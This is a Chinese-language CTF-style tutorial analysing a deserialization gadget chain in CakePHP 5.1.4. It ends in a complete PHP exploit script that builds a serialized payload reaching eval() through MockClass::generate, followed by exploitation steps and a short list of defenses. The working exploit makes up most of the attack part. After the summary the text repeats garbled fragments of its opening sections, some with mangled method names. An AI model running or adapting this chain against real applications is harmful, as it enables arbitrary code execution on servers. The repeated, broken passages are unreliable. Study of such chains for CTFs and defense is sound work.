CakePHP 反序列化漏洞分析教学文档<\/h1>

漏洞概述<\/h2>
本文档详细分析CakePHP 5.1.4版本中的反序列化漏洞，包括漏洞原理、利用链构造和EXP编写方法。<\/p>

漏洞背景<\/h2>
在SUCTF比赛中考察了CakePHP的反序列化漏洞，由于以前版本的利用链在5.1.4版本中失效，需要重新挖掘新的利用链。<\/p>

漏洞分析<\/h2>

1. 反序列化入口点(Source点)<\/h3>

在CakePHP 5.1.4中，传统的利用链入口vendor\symfony\process\Process<\/code>类的__destruct<\/code>方法不再可用，因为：<\/p>


该类添加了__wakeup<\/code>魔术方法<\/li>
__wakeup<\/code>会在__destruct<\/code>前执行并抛出异常<\/li>
PHP 8.1+版本目前没有绕过__wakeup<\/code>的有效方法<\/li>
<\/ul>
新的入口点选择在src\Internal\RejectedPromise<\/code>类的__destruct<\/code>方法：<\/p>
\/\/ src\/Internal\/RejectedPromise.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> __destruct() {
<\/span><\/span>    if<\/span> ($this-><\/span>reason<\/span> instanceof<\/span> \Throwable<\/span>) {
<\/span><\/span>        throw<\/span> $this-><\/span>reason<\/span>;
<\/span><\/span>    }
<\/span><\/span>    \/\/ 存在字符串拼接操作，$reason可控
<\/span><\/span><\/span><\/span>    throw<\/span> new<\/span> \RuntimeException<\/span>($this-><\/span>reason<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 利用链构造<\/h3>
2.1 触发__toString<\/h4>
通过RejectedPromise<\/code>的__destruct<\/code>方法中的字符串拼接操作，可以触发任意对象的__toString<\/code>魔术方法。<\/p>
2.2 选择__toString目标<\/h4>
选择src\Ast\Type\ConstTypeNode<\/code>类的__toString<\/code>方法：<\/p>
\/\/ src\/Ast\/Type\/ConstTypeNode.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> __toString():<\/span> string<\/span> {
<\/span><\/span>    return<\/span> (string<\/span>) $this-><\/span>constExpr<\/span>;  \/\/ 可以触发任意对象的__toString
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.3 触发__call<\/h4>
将$constExpr<\/code>赋值为src\ORM\Table<\/code>对象，该对象没有__toString<\/code>方法，会触发其__call<\/code>方法：<\/p>
\/\/ src\/ORM\/Table.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> __call(string<\/span> $method, array<\/span> $args) {
<\/span><\/span>    return<\/span> $this-><\/span>_behaviors<\/span>-><\/span>call<\/span>($method, $args);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.4 调用任意方法<\/h4>
Table<\/code>类的__call<\/code>方法会调用BehaviorRegistry<\/code>的call<\/code>方法：<\/p>
\/\/ src\/ORM\/BehaviorRegistry.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> call<\/span>(string<\/span> $method, array<\/span> $args =<\/span> []) {
<\/span><\/span>    $behavior =<\/span> $this-><\/span>_methodMap<\/span>[$method][0<\/span>] ??<\/span> null<\/span>;
<\/span><\/span>    $callMethod =<\/span> $this-><\/span>_methodMap<\/span>[$method][1<\/span>] ??<\/span> $method;
<\/span><\/span>    
<\/span><\/span>    if<\/span> ($behavior &&<\/span> $this-><\/span>has<\/span>($behavior)) {
<\/span><\/span>        return<\/span> $this-><\/span>_loaded<\/span>[$behavior]-><\/span>{$callMethod}(...<\/span>$args);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过控制$_methodMap<\/code>和$_loaded<\/code>属性，可以实现任意方法调用。<\/p>
3. 最终利用点(Sink点)<\/h3>
选择src\Framework\MockObject\Generator\MockClass<\/code>类的generate<\/code>方法作为最终利用点：<\/p>
\/\/ src\/Framework\/MockObject\/Generator\/MockClass.php
<\/span><\/span><\/span><\/span>public<\/span> function<\/span> generate<\/span>():<\/span> string<\/span> {
<\/span><\/span>    if<\/span> (!<\/span>class_exists<\/span>($this-><\/span>mockName<\/span>)) {
<\/span><\/span>        eval<\/span>($this-><\/span>classCode<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $this-><\/span>mockName<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>该方法可以通过eval<\/code>执行任意PHP代码，且不需要参数。<\/p>
EXP构造<\/h2>
完整的EXP构造如下：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> PHPUnit\Framework\MockObject\Generator<\/span>;
<\/span><\/span>final<\/span> class<\/span> MockClass<\/span> {
<\/span><\/span>    public<\/span> $mockName;
<\/span><\/span>    public<\/span> $classCode;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>mockName<\/span> =<\/span> "MockClass"<\/span>;
<\/span><\/span>        $this-><\/span>classCode<\/span> =<\/span> "phpinfo();"<\/span>; \/\/ 要执行的恶意代码
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Cake\Core<\/span>;
<\/span><\/span>abstract<\/span> class<\/span> ObjectRegistry<\/span> {
<\/span><\/span>    public<\/span> $_loaded =<\/span> [];
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> Cake\ORM<\/span>;
<\/span><\/span>use<\/span> Cake\Core\ObjectRegistry<\/span>;
<\/span><\/span>use<\/span> PHPUnit\Framework\MockObject\Generator\MockClass<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> BehaviorRegistry<\/span> extends<\/span> ObjectRegistry<\/span> {
<\/span><\/span>    public<\/span> $_methodMap =<\/span> [];
<\/span><\/span>    public<\/span> function<\/span> count<\/span>():<\/span> int<\/span> {}
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Table<\/span> {
<\/span><\/span>    public<\/span> BehaviorRegistry<\/span> $_behaviors;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $a =<\/span> new<\/span> MockClass<\/span>();
<\/span><\/span>        $this-><\/span>_behaviors<\/span> =<\/span> new<\/span> BehaviorRegistry<\/span>();
<\/span><\/span>        $this-><\/span>_behaviors<\/span>-><\/span>_methodMap<\/span> =<\/span> ["__tostring"<\/span> =><\/span> ["MockClass"<\/span>, "generate"<\/span>]];
<\/span><\/span>        $this-><\/span>_behaviors<\/span>-><\/span>_loaded<\/span> =<\/span> ["MockClass"<\/span> =><\/span> $a];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> React\Promise\Internal<\/span>;
<\/span><\/span>final<\/span> class<\/span> RejectedPromise<\/span> {
<\/span><\/span>    public<\/span> $reason;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> PHPStan\PhpDocParser\Ast<\/span>;
<\/span><\/span>interface<\/span> Node<\/span> {};
<\/span><\/span>
<\/span><\/span>namespace<\/span> PHPStan\PhpDocParser\Ast\Type<\/span>;
<\/span><\/span>use<\/span> PHPStan\PhpDocParser\Ast\Node<\/span>;
<\/span><\/span>interface<\/span> TypeNode<\/span> extends<\/span> Node<\/span> {}
<\/span><\/span>
<\/span><\/span>namespace<\/span> PHPStan\PhpDocParser\Ast\Type<\/span>;
<\/span><\/span>use<\/span> Cake\ORM\Table<\/span>;
<\/span><\/span>use<\/span> React\Promise\Internal\RejectedPromise<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> ConstTypeNode<\/span> {
<\/span><\/span>    public<\/span> $constExpr;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$pop =<\/span> new<\/span> RejectedPromise<\/span>();
<\/span><\/span>$pop-><\/span>reason<\/span> =<\/span> new<\/span> ConstTypeNode<\/span>();
<\/span><\/span>$pop-><\/span>reason<\/span>-><\/span>constExpr<\/span> =<\/span> new<\/span> Table<\/span>();
<\/span><\/span>echo<\/span> base64_encode<\/span>(serialize<\/span>($pop));
<\/span><\/span><\/code><\/pre>利用步骤<\/h2>

构造恶意序列化数据<\/li>
将数据传递给存在反序列化漏洞的CakePHP应用<\/li>
触发反序列化操作<\/li>
执行恶意代码<\/li>
<\/ol>
防御措施<\/h2>

避免反序列化用户可控的数据<\/li>
及时更新CakePHP到最新版本<\/li>
使用白名单验证反序列化数据<\/li>
实施严格的输入过滤<\/li>
<\/ol>
总结<\/h2>
本漏洞利用链通过以下路径实现代码执行：<\/p>
RejectedPromise::__destruct()<\/code> → ConstTypeNode::__toString()<\/code> → Table::__call()<\/code> → BehaviorRegistry::call()<\/code> → MockClass::generate()<\/code> → eval()<\/code><\/p>
通过精心构造的利用链，最终实现了任意代码执行。<\/p>

CakePHP 反序列化漏洞分析教学文档<\/h1>

漏洞概述<\/h2> 本文档详细分析CakePHP 5.1.4版本中的反序列化漏洞，包括漏洞原理、利用链构造和EXP编写方法。<\/p>

漏洞背景<\/h2> 在SUCTF比赛中考察了CakePHP的反序列化漏洞，由于以前版本的利用链在5.1.4版本中失效，需要重新挖掘新的利用链。<\/p>

漏洞分析<\/h2>

2. 利用链构造<\/h3>

2.1 触发__toString<\/h4> 通过RejectedPromise<\/code>的__destruct<\/code>方法中的字符串拼接操作，可以触发任意对象的__toString<\/code>魔术方法。<\/p>

漏洞概述<\/h2>
本文档详细分析CakePHP 5.1.4版本中的反序列化漏洞，包括漏洞原理、利用链构造和EXP编写方法。<\/p>

漏洞背景<\/h2>
在SUCTF比赛中考察了CakePHP的反序列化漏洞，由于以前版本的利用链在5.1.4版本中失效，需要重新挖掘新的利用链。<\/p>

2.1 触发toString<\/h4>
通过`RejectedPromise<\/code>的destruct<\/code>方法中的字符串拼接操作，可以触发任意对象的__toString<\/code>魔术方法。<\/p>`